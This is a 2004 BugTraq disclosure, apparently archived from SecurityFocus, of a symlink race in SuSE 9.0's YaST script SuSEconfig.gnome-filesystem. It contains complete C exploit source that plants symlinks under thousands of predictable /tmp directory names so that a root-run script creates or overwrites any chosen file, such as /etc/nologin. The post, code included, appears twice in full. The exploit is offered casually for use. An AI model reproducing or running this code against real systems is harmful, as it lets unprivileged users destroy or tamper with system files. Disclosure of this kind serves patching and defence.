BugTraq
Back to list
|
Post reply
SuSE linux 9.0 YaST config Skribt [exploit]
Jan 13 2004 08:28PM
Rene (l0om excluded org)
Author: l0om <l0om (at) excluded (dot) org [email concealed]>
Date: 12.01.2004
page: www.excluded.org
SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
There is a symlink problem in the
SuSEconfig.gnome-filesystem
scribt. a normal user can creat and overwrite every
file
on the system. This script gets executed after a
configuration change by the
setup tool YaST. So if you have installed gnome or
parts of gnome check this out.
When this scribt gets executed by YaST after a
configuration change it does the following:
TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
mkdir $TEMP
touch $TEMP/list
[...]
echo >$TEMP/found
[...]
the env variable $RANDOM includes a random number.
in my tests
this number goes up from 1 to 33000. But also if it
goes up to
65535 it is still vul. to a symlink attack. this is
nearly as
bad as the symlink problem which has been found on
SuSE 8.2.
On 8.2 a SuSEconf scribt has created a link with the
$$ at the
file end.
I have used a little exploit written in C which
creats the
directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1"
up to
33000. in every directory i have created a symlink
to a file
which i want to creat or to overwrite. as the
filename i have
taken the $TEMP/found and let it point to some file.
in my test i
have taken the /etc/nologin- and hey- it has worked!
have phun!
*******************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000
int main(int argc, char **argv)
{
int i;
char buf[150];
printf("\tSuSE 9.0 YaST script
SuSEconfig.gnome-filesystem exploit\n");
printf("\t-------------------------------------------------------------
\n");
printf("\tdiscovered and written by l0om
<l0om (at) excluded (dot) org [email concealed]>\n");
printf("\t WWW.EXCLUDED.ORG\n\n");
if(argc != 2) {
printf("usage: %s <destination-file>\n",argv[0]);
exit(0xff);
}
printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
read(1, buf, 1); fflush(stdin);
umask(0000);
printf("working\n\n");
for(i = START; i < END; i++) {
snprintf(buf, sizeof(buf),"%s%d",PATH,i);
if(mkdir(buf,00777) == -1) {
fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);
exit(0xff);
}
if(!(i%1000))printf(".");
strcat(buf, "/found");
if(symlink(argv[1], buf) == -1) {
fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
exit(0xff);
}
}
printf("\ndone!\n");
printf("next time the SuSE.gnome-filesystem script
gets executed\n");
printf("we will create or overwrite file %s
\n",argv[1]);
return(0x00);
} /* i cant wait for the new gobbles comic!! */
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Author: l0om <l0om (at) excluded (dot) org [email concealed]>
Date: 12.01.2004
page: www.excluded.org
SuSE 9.0 - YaST script SuSEconfig.gnome-filesystem
There is a symlink problem in the
SuSEconfig.gnome-filesystem
scribt. a normal user can creat and overwrite every
file
on the system. This script gets executed after a
configuration change by the
setup tool YaST. So if you have installed gnome or
parts of gnome check this out.
When this scribt gets executed by YaST after a
configuration change it does the following:
TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM
mkdir $TEMP
touch $TEMP/list
[...]
echo >$TEMP/found
[...]
the env variable $RANDOM includes a random number.
in my tests
this number goes up from 1 to 33000. But also if it
goes up to
65535 it is still vul. to a symlink attack. this is
nearly as
bad as the symlink problem which has been found on
SuSE 8.2.
On 8.2 a SuSEconf scribt has created a link with the
$$ at the
file end.
I have used a little exploit written in C which
creats the
directory "/tmp/tmp.SuSEconfig.gnome-filesystem.1"
up to
33000. in every directory i have created a symlink
to a file
which i want to creat or to overwrite. as the
filename i have
taken the $TEMP/found and let it point to some file.
in my test i
have taken the /etc/nologin- and hey- it has worked!
have phun!
*******************************************************************/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000
int main(int argc, char **argv)
{
int i;
char buf[150];
printf("\tSuSE 9.0 YaST script
SuSEconfig.gnome-filesystem exploit\n");
printf("\t-------------------------------------------------------------
\n");
printf("\tdiscovered and written by l0om
<l0om (at) excluded (dot) org [email concealed]>\n");
printf("\t WWW.EXCLUDED.ORG\n\n");
if(argc != 2) {
printf("usage: %s <destination-file>\n",argv[0]);
exit(0xff);
}
printf("### hit enter to create or overwrite file %
s: ",argv[1]); fflush(stdout);
read(1, buf, 1); fflush(stdin);
umask(0000);
printf("working\n\n");
for(i = START; i < END; i++) {
snprintf(buf, sizeof(buf),"%s%d",PATH,i);
if(mkdir(buf,00777) == -1) {
fprintf(stderr, "cannot creat directory [Nr.%d]
\n",i);
exit(0xff);
}
if(!(i%1000))printf(".");
strcat(buf, "/found");
if(symlink(argv[1], buf) == -1) {
fprintf(stderr, "cannot creat symlink from %s to %s
[Nr.%d]\n",buf,argv[1],i);
exit(0xff);
}
}
printf("\ndone!\n");
printf("next time the SuSE.gnome-filesystem script
gets executed\n");
printf("we will create or overwrite file %s
\n",argv[1]);
return(0x00);
} /* i cant wait for the new gobbles comic!! */
[ reply ]